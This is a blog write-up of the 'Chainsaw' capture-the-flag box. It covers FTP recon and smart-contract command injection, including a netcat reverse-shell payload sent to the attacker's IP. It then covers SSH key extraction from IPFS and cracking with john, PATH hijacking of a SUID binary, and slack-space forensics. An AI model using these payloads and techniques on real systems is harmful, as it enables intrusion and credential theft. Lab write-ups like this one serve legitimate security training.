Cyber Security & Data Protection
23 November, 2019 — Go back to homepage
This document contains written techniques to successfully exploit the “Chainsaw” box, commencing from a command injection through Ethereum’s Remote Procedure Call (RPC) interface, using the InterPlanetary File System (IPFS) protocol to retrieve Secure Shell (SSH) private keys, followed by escalating to root shell through making a valid transaction to steal funds from a smart contract, and finally performing file system forensics to get the root flag hidden in slack space.
As usually, we start with nmap
to check which ports are open on the server:
$ mkdir nmap
$ nmap -sC -oA nmap/initial -p-
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 1001 1001 23828 Dec 05 13:02 WeaponizedPing.json
| -rw-r--r-- 1 1001 1001 243 Dec 12 23:46 WeaponizedPing.sol
|_-rw-r--r-- 1 1001 1001 44 Dec 13 00:12 address.txt
| ftp-syst:
| FTP server status:
| Connected to ::ffff:
| Logged in as ftp
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh
| ssh-hostkey:
| 2048 02:dd:8a:5d:3c:78:d4:41:ff:bb:27:39:c1:a2:4f:eb (RSA)
| 256 3d:71:ff:d7:29:d5:d4:b2:a6:4f:9d:eb:91:1b:70:9f (ECDSA)
|_ 256 7e:02:da:db:29:f9:d2:04:63:df:fc:91:fd:a2:5a:f2 (ED25519)
9810/tcp open unknown
There are three (3) services running in the box. The first interesting one is FTP running on port 21 which seems to have anonymous login enabled with the following files: WeaponizedPing.json, WeaponizedPing.sol, and address.txt. Moreover, besides SSH running on port 22 which has the password authentication mechanism disabled (implies key usage), there is one more unknown service running on port 9810 which nmap
could not get fingerprint information from.
We will first download the public files using ftp
with download confirmation prompt disabled (-i):
$ ftp -i
ftp> mget *
ftp> exit
We commence by taking a look at WeaponizedPing.sol:
pragma solidity ^0.4.24;
contract WeaponizedPing
string store = "";
function getDomain() public view returns (string)
return store;
function setDomain(string _value) public
store = _value;
The above source code seems to be written for Solidity version 0.4.24 that represents a simple smart contract built on top of the Ethereum technology. A contract in the sense of Solidity is a collection of code (its functions) and data (its state) that resides at a specific address on the blockchain. There are two functions implemented in the contract, getDomain() which returns the value of the store variable (in this case, initial value is “”) and setDomain() which allows you to override said value.
On the other hand, WeaponizedPing.json holds the configuration file for the smart contract in the JSON format, and address.txt the address value to uniquely identify the contract, generated by computer program, where storage can be fetched or set – in our case, a domain name.
Based on the functionality of the source code and its name, WeaponizedPing, which may or may not be a ping service to test if a domain or IP address is reachable, then we might look into command injection – which is common in these instances.
Visiting will simply output a HTTP bad request error code of 400. Taking into consideration information gathered from the reconnaissance process, the mention of blockchain technology and Ethereum on top of it may imply that port 9810 can be a potentially RPC interface to Ethereum clients – a service which became popular in 2017 due to the cryptocurrency publicity.
Our main objective is to gain the ability to modify and manipulate the domain value, and for that, we will develop a script in Python 3 to craft our request.
To interact with Ethereum, we will use the Web3 library (which can be installed using pip
) and we will use two essential elements, besides contract’s address, from the configuration file provided:
We will be using various functions from Web3
to establish a connection with the RPC interface using Web3.HTTPProvider
, load necessary values through eth.defaultAccount
and finally the custom function setDomain()
to override “” to “”:
# -*- coding: utf-8 -*-
import json, subprocess
import netifaces as ni
from web3 import Web3
def run_exploit(ip):
# Store Ethereum contract address
caddress = open('address.txt', 'r').read()
caddress = caddress.replace('\n', '')
# Load Ethereum contract configuration
with open('WeaponizedPing.json') as f:
contractData = json.load(f)
# Establish a connection with the Ethereum RPC interface
w3 = Web3(Web3.HTTPProvider(''))
w3.eth.defaultAccount = w3.eth.accounts[0]
# Get Application Binary Interface (ABI) and Ethereum bytecode
Url = w3.eth.contract(abi=contractData['abi'],
contractInstance = w3.eth.contract(address=caddress,
# Calling the function of contract to set a new domain
url = \
if __name__ == '__main__':
ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr']
print('[*] Failed to fetch local IP address')
To confirm our code is working, we will set our IP address as the domain value:
url = contractInstance.functions.setDomain('{}'.format(ip)).transact()
And sure enough, a single ICMP request will appear in our tcpdump
$ tcpdump -i eth0 icmp
03:36:05.225134 IP > ICMP echo request, id 1, seq 96, length 40
03:36:05.225173 IP > ICMP echo reply, id 1, seq 96, length 40
This means that the software is most likely running a system command to ping
once a retrieved value of the domain. Taking this fact into consideration, we can then inject arbitrary commands after the domain name through piping, such as using netcat
(assuming it is installed in the box) to spawn a reverse shell:
rl = contractInstance.functions.setDomain(' | nc {} 9191 -e /bin/bash'.format(ip)).transact()
# Start netcat handler for reverse shell["nc -lvnp 9191"], shell=True, stderr=subprocess.STDOUT)
This will pop a shell as user administrator in which no user flag is found, meaning that we need to continue with local enumeration.
Fully automated and formatted code for the exploit can be found in my public gist. As you may notice, the script also leverages ftplib
to fetch the newly generated blockchain address each time the machine is reset; this is a detail quite a number of people had to learn the hard way:
def getFiles():
ftp = ftplib.FTP(TARGET_IP)
ftp.login('anonymous', 'chainsaw')
filenames = ftp.nlst()
for filename in filenames:
if os.path.exists(filename):
file = open(filename, 'wb')
ftp.retrbinary('RETR '+ filename, file.write)
Note: You can also use the NodeJS Web3 or geth command line interface implemented in Go language to interact with the JSON RPC; the same result can be also achieved through curl
$ curl -X POST --data '{"jsonrpc":"2.0","method":"eth_call","params":[{"from": "0xa6bcc6ac459ad9d568f0d11365cd5541496bf008", "to": "0x4a3e40bb27f21d30d51f636f31b129c3c9956177", "data": "0xb68d1809"}, "latest"]}'
By a quick overview of administrator’s home folder, we will notice a CSV file, a maintain directory and a couple of hidden directories.
The CSV file holds information about Chainsaw employees with their usernames, role status, and role descriptions. It seems that only the user bobby, who is a smart contract auditor, is the only one active at the moment, and we can confirm this by his home directory presence in /home and a valid Unix shell in /etc/passwd. In conclusion, we need to escalate to bobby to grab the user flag.
The maintain directory seems to contain employees public RSA keys (which were probably generated from the script – which also generates encrypted private keys, except, they are the ones missing).
Furthermore, among hidden directories in which mostly have little to no value, .ipfs is an interesting one which may give us necessary information to proceed further in this box. InterPlanetary File System (IPFS) is a peer-to-peer network protocol that utilizes distributed systems (including blockchain) with its main objective of hypermedia sharing.
With the aim of replacing HTTP, it is an open source project available on GitHub, therefore, it is already available for installation in different systems, including Linux – where we can confirm its presence by issuing a simple command to retrieve our own peer information:
$ ipfs id
"ID": "QmPfaAfb157bVHC1Y3waMEkX5QHjrF5UrvHqcNdp4R1BGy",
"PublicKey": "CAASpgIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDeME8+9MUmzPvifqnqC7dM4rtPfqOn4STLZxC5OgizeavrygOubfKosRdRkKNkm9DdNTsR5gB9QANiHkRnQ57bLwheH4o895Ib/lW/WOhwmOtks1iV9VIUj7DTnuQDNcN2IuVcnpC8x5HFQoNIgsj2HgqxLnlPCJboaTYo3oGwflqE2o2+/pwZjM2My3ux9FYCg7GhEpXO6WGpH6Jxq2Z3wOA1z1qVSOmAPSPgSOvvFGvKyfU6ntta8qd3EC15x4002CB9OSA/pTbchSTr3gS9QOMq5Wn55vEwNaOFNf/qOImaRWYER8epyHB/E4kKJ9XAeL7U7xfKpQDhrqvEdq2/AgMBAAE=",
"Addresses": null,
"AgentVersion": "go-ipfs/0.4.18/",
"ProtocolVersion": "ipfs/0.1.0"
In IPFS, every link/file is identified with a unique hash. However, as seen from the process list, IPFS daemon is not running which means that it is only running locally.
To list all objects stored in the local IPFS repository, we will use the following command:
$ ipfs refs local
These objects could be either files or directories. To skip a lot of unnecessary output that the files might have, we will try to list (ipfs ls
) information about these hashes.
$ for i in $(ipfs refs local); do ipfs ls $i 2> /dev/null; done;
QmXWS8VFBxJPsxhF8KEqN1VpZf52DPhLswcXpxEDzF5DWC 391
QmPjsarLFBcY8seiv3rpUZ2aTyauPF3Xu3kQm56iD6mdcq 391
QmUHHbX4N8tUNyXFK9jNfgpFFddGgpn72CF1JyNnZNeVVn 391
QmUH2FceqvTSAvn6oqm8M49TNDqowktkEx4LgpBx746HRS 391
QmcMCDdN1qDaa2vaN654nA4Jzr6Zv9yGSBjKPk26iFJJ4M 391
QmZrd1ik8Z2F5iSZPDA2cZSmaZkHFEE4jZ3MiQTDKHAiri 45459 mail-log/
QmbwWcNc7TZBUDFzwW7eUTAyLE2hhwhHiTXqempi1CgUwB 10063 artichain600-protonmail-2018-12-13T20_50_58+01_00.eml
QmViFN1CKxrg3ef1S8AJBZzQ2QS8xrcq3wHmyEfyXYjCMF 4640 bobbyaxelrod600-protonmail-2018-12-13-T20_28_54+01_00.eml
QmZxzK6gXioAUH9a68ojwkos8EaeANnicBJNA3TND4Sizp 10084 bryanconnerty600-protonmail-2018-12-13T20_50_36+01_00.eml
QmegE6RZe59xf1TyDdhhcNnMrsevsfuJHUynLuRc4yf6V1 10083 laraaxelrod600-protonmail-2018-12-13T20_49_35+01_00.eml
QmXwXzVYKgYZEXU1dgCKeejT87Knw9nydGcuUZrjwNb2Me 10092 wendyrhoades600-protonmail-2018-12-13T20_50_15+01_00.eml
QmZTR5bcpQD7cFgTorqxZDYaew1Wqgfbd2ud9QqGPAkK2V 1688 about
QmYCvbfNbCwFR45HiNP45rwJgvatpiW38D961L5qAhUM5Y 200 contact
QmY5heUM5qgRubMDD1og9fhCPA6QdkMp3QCwd4s7gJsyE7 322 help
QmejvEPop4D7YUadeGqYWmZxHhLc4JBUCzJJHWMzdcMe2y 12 ping
QmXgqKTbzdh83pQtKFb19SpMCpDDcKR2ujqk3pKph9aCNF 1692 quick-start
QmPZ9gcCEpqKTo6aq61g2nXGUhM4iCL3ewB6LDXZCtioEB 1102 readme
QmQ5vhrL7uv6tuoN9KeVBwd4PwfQkXdVVmDLUZuTNxqgvm 1173 security-notes
QmWMuEvh2tGJ1DiNPPoN6rXme2jMYUixjxsC6QUji8mop8 2996 maintain/
QmXymZCHdTHz5BA5ugv9MQTBtQAb6Vit4iFeEnuRj6Udrh 660
QmPctBY8tq2TpPufHuQUbe2sCxoy2wD5YRB6kdce35ZwAx 2237 pub/
QmYn3NxLLYA6xU2XL1QJfCZec4B7MpFNxVVtDvqbiZCFG8 231 chainsaw-emp.csv
We see a bunch of files and directories, some which are already familiar from administrator’s home directory. However, there is an extra directory, mail-log, which seems to have a couple of EML (email message) files. They must be emails previously sent to the employees which are stored in blockchain at the moment. Since our target user is bobby, we will try to print the content of bobbyaxelrod600-protonmail-2018-12-13-T20_28_54+01_00.eml hash:
$ ipfs cat QmViFN1CKxrg3ef1S8AJBZzQ2QS8xrcq3wHmyEfyXYjCMF
The resulting content will display information about both email message header and email content which was sent from to The body part consists of a body message and an attachment included in the email – both encoded in Base64 by the email program (ProtonMail).
An alternative way would be to recursively grep for keywords such as “protonmail” to find the relevant chunk of data from /home/bobby/.ipfs/blocks/BLOCKID/
Body message (decoded):
I am writing this email in reference to the method on how we access our Linux server from now on. Due to security reasons, we have disabled SSH password authentication and instead we will use private/public key pairs to securely and conveniently access the machine.
Attached you will find your personal encrypted private key. Please ask the reception desk for your password, therefore be sure to bring your valid ID as always.
IT Administration Department
Attachment “bobby.key.enc” (decoded):
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,53D881F299BA8503
Now that we managed to grab the private RSA key for user bobby, we need to decrypt it since it is protected with a passphrase (using triple DES as the encryption algorithm with CBC mode). We will use ssh2john
to extract the hash, and john
to brute force the value (which will eventually give us the password “jackychain”):
$ ssh2john bobby.key.enc > bobby-hash.txt
$ john bobby-hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
jackychain (bobby.key.enc)
1g 0:00:05:53 DONE (2018-12-13 23:04) 0.002828g/s 20435p/s 20435c/s 20435C/s jackychain
$ openssl rsa -in bobby.key.enc -out bobby.key -passin pass:jackychain
$ ssh -i bobby.key bobby@
After logging in, we get the user flag (af8d9d…).
After we SSH in as bobby, we notice the following folders in his home directory:
• projects – contains a folder named ChainsawClub which bobby is working in;
• resources – contains some PDFs for the IPFS protocol (not important).
There is yet another smart contract in the ChainsawClub project, this time it is longer in code and seems to make credit transactions. Besides the smart contract (ChainsawClub.sol), there is its configuration file (ChainsawClub.json) and a binary file with sticky bit set. Running it will generate a new Ethereum address in the current working directory and will ask for credentials (banner will show we need to create a user first), so that is why we start analyzing the code of the contract to get a better understanding.
pragma solidity ^0.4.22;
contract ChainsawClub {
string username = 'nobody';
string password = '7b455ca1ffcb9f3828cfdde4a396139e';
bool approve = false;
uint totalSupply = 1000;
uint userBalance = 0;
function getUsername() public view returns (string) {
return username;
function setUsername(string _value) public {
username = _value;
function getPassword() public view returns (string) {
return password;
function setPassword(string _value) public {
password = _value;
function getApprove() public view returns (bool) {
return approve;
function setApprove(bool _value) public {
approve = _value;
function getSupply() public view returns (uint) {
return totalSupply;
function getBalance() public view returns (uint) {
return userBalance;
function transfer(uint _value) public {
if (_value > 0 && _value <= totalSupply) {
totalSupply -= _value;
userBalance += _value;
function reset() public {
username = '';
password = '';
userBalance = 0;
totalSupply = 1000;
approve = false;
We notice a bunch of getters and setters by breaking down the code:
For the exploit development part, we need to use the Web3
library again to interact with the Ethereum interface, however, this time we do not have any information with reference to another RPC interface within the box. If we check the ChainsawClub
binary shared object dependencies using ldd
, we can notice an unusual preloaded library named before default system objects are invoked:
$ ldd ChainsawClub (0x00007fff708b0000)
/usr/$LIB/ => /usr/lib/x86_64-linux-gnu/ (0x00007f351569b000) => /lib/x86_64-linux-gnu/ (0x00007f35154a8000) => /lib/x86_64-linux-gnu/ (0x00007f35154a2000)
/lib64/ (0x00007f35156a8000)
Since we are using 64-bit ELF files, the $LIB variable will expand to lib/x86_64-linux-gnu/ in our Debian case. If we disassemble the binary, we will first notice hardcoded declared variables:
What stands out is that “process_to_filter” has a value of the string “node” which is later referenced in the following procedure:
int readdir64(int arg0) {
var_228 = arg0;
if (*original_readdir64 == 0x0) {
*original_readdir64 = dlsym(0xffffffffffffffff, "readdir");
if (*original_readdir64 == 0x0) {
fprintf(**qword_3ff8, "Error in dlsym: %s\n", dlerror());
do {
var_218 = original_readdir64(var_228);
if (var_218 == 0x0) {
rax = get_dir_name(var_228, &var_210, 0x100);
if (rax == 0x0) {
rax = strcmp(&var_210, "/proc");
if (rax != 0x0) {
rax = get_process_name(var_218 + 0x13, &var_110);
if (rax == 0x0) {
rax = strcmp(&var_110, *process_to_filter);
if (rax != 0x0) {
} while (true);
rax = var_218;
rcx = *0x28 ^ *0x28;
if (rcx != 0x0) {
rax = __stack_chk_fail();
return rax;
The logic is fairly simple – the structure makes use of two functions by iterating the get_dir_name() function which returns a relevant directory name given the DIR* handle, and get_process_name() that finds the correct process name given a PID number used in /proc/PID. The process is basically overriding libc’s readdir() function so that everytime the /proc/PID directory is read from a binary (which by default loads this shared library before the normal system’s ones), the access to that specific PID belonging to process_to_filter is skipped/blocked.
Simply put, any process initiated with “node” is not shown in our typical process listing tools such as ps
. Consequently, we do not know the port number the RPC uses since ganache-cli
uses node
. However, if we check ports listening internally within the machine using netstat
, we will see a queer port number of 63991. We can only assume that it belongs to Ethereum RPC for now.
$ netstat -punta | grep LISTEN
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0* LISTEN -
tcp 0 0* LISTEN -
tcp 0 0* LISTEN -
tcp 0 0* LISTEN -
tcp6 0 0 :::21 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
Moving on, we will develop another script to try and interact with the higher port number – and indeed, confirm that it is an RPC interface. To summarize the exploit script, which needs quite some attempts to get it right through playing around contract’s functions, we need to fulfill four conditions:
# -*- coding: utf-8 -*-
from web3 import Web3
import json, hashlib
def enter_club():
# Store Ethereum contract address
with open("/home/bobby/projects/ChainsawClub/address.txt",'r') as f:
caddress =
# Load Ethereum contract configuration
with open('/home/bobby/projects/ChainsawClub/ChainsawClub.json') as f:
contractData = json.load(f)
# Establish a connection with the Ethereum RPC interface
w3 = Web3(Web3.HTTPProvider(''))
w3.eth.defaultAccount = w3.eth.accounts[0]
# Get Application Binary Interface (ABI) and Ethereum bytecode
Url = w3.eth.contract(abi=contractData['abi'],
contractInstance = w3.eth.contract(address=caddress,
# Phase I & II: Create a new account and confirm
username = "artikrh"
password = hashlib.md5()
password = password.hexdigest()
cusername = contractInstance.functions.getUsername().call()
cpassword = contractInstance.functions.getPassword().call()
print("[*] Added user: {}".format(cusername))
print("[*] Password (MD5): {}".format(cpassword))
# Phase III: Approve our user and confirm
approvalStatus = contractInstance.functions.getApprove().call()
print("[*] Approval status: {}".format(approvalStatus))
# Phase IV: Transfer needed funds of value 1000 and confirm
supply = contractInstance.functions.getSupply().call()
balance = contractInstance.functions.getBalance().call()
print("[*] Supply left: {}".format(supply))
print("[*] Total balance: {}".format(balance))
if __name__ == "__main__":
The result is seen in the following picture:
Properly formatted code for privilege escalation can be found in my public gist.
Note: It is also worth stating that there is a unintended solution for escalation in root shell through path hijacking. If we open the SUID file with radare2
, we will notice that the program runs /root/ChainsawClub/dist/ChainsawClub/ChainsawClub with sudo
[0x00001060]> pdf@main
/ (fcn) main 33
| int main (int argc, char **argv, char **envp);
| ; DATA XREF from entry0 @ 0x107d
| 0x00001145 55 push rbp
| 0x00001146 4889e5 mov rbp, rsp
| 0x00001149 bf00000000 mov edi, 0
| 0x0000114e e8edfeffff call sym.imp.setuid
| 0x00001153 488d3dae0e00. lea rdi, qword str.sudo__i__u_root__root_ChainsawClub_dist_ChainsawClub_ChainsawClub ; 0x2008 ; "sudo -i -u root /root/ChainsawClub/dist/ChainsawClub/ChainsawClub" ; const char *string
| 0x0000115a e8d1feffff call sym.imp.system ; int system(const char *string)
| 0x0000115f b800000000 mov eax, 0
| 0x00001164 5d pop rbp
\ 0x00001165 c3 ret
Since sudo
is lacking the full path of /usr/bin/sudo, we can make a custom file/script in the current directory called “sudo” – for which the program will run with root privileges; since the first path lookup is always the current working directory.
$ cat << EOF > sudo && chmod +x ./sudo && ./ChainsawClub
After we get a root shell, if we print the content of root.txt we will get the following:
# cat root.txt
Mine deeper to get rewarded with root coin (RTC)...
That means that our work is not done yet and that we need further enumeration within the box. One of the last resorts after we run out of options for low hanging fruits, is to check default binaries paths in case there is an interesting program installed or programmed in the machine.
I usually list items based in reverse modified date and time since the default installed binaries are usually the oldest and not much of an interest. In the /sbin directory, we can notice an unusual program called bmap
# ls -ltr --group-directories-first /sbin
-rwxr-xr-x 1 root root 63824 Nov 30 23:01 bmap
A google search about it will bring results related to a generic tool for creating the block map for a file or copying files using the block map, and digital forensics. In simple terms from operating system concepts, blocks are specific sized containers used by file system to store data. Blocks can also be defined as the smallest pieces of data that a file system can use to store information. Files can consist of a single or multiple block in order to fulfill the size requirements of the file.
When data is stored in these blocks, two mutually exclusive conditions can occur:
From a forensic perspective, there is a GitHub repository which utilizes slack space in blocks to hide data (one of many interesting functions to the forensic community this tool can perform).
In our Linux file system, we have a root.txt which contains 52 characters (52 bytes) from a total of 4096 bytes (4kb) block size. This means that slack space consists of 4044 bytes in which data can be hidden and not seen from tools such as cat
. Because bmap
is installed (which is the hint for the slack space technique), we are able to retrieve the root flag by showing slack space content:
# bmap --mode slack root.txt
getting from block 1646490
file size was: 52
slack size: 4044
block size: 4096
Note: Root flag can also be found by digging file system’s offsets around the root.txt file, or even easier:
# strings /dev/sda2 | grep -A1 "Mine deeper to get rewarded with root coin (RTC)..."
Mine deeper to get rewarded with root coin (RTC)...